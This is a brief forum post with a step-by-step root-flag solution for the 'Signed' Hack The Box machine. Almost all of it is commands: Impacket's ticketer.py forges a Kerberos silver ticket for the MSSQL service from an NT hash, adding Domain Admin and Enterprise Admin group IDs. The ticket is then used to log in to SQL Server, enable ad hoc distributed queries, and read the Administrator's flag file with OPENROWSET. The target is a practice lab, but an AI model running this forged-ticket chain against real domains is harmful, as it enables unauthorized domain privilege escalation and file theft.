12-10-25, 05:16 PM
Hello, this is the way to get the root flag on Signed HTB - S9
Code:
ticketer.py -nthash EF699384C3285C54128A3EE1DDB1A0CC \
-domain-sid S-1-5-21-4088429403-1159899800-2753317549 \
-domain SIGNED.HTB \
-spn MSSQLSvc/DC01.SIGNED.HTB \
-groups 512,519,1105 \
-user-id 1103 \
mssqlsvcCode:
export KRB5CCNAME=mssqlsvc.ccache
mssqlclient.py -k -no-pass DC01.SIGNED.HTBCode:
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'Ad Hoc Distributed Queries', 1;
RECONFIGURE;Code:
SELECT * FROM OPENROWSET(BULK 'C:\Users\Administrator\Desktop\root.txt', SINGLE_CLOB) AS x;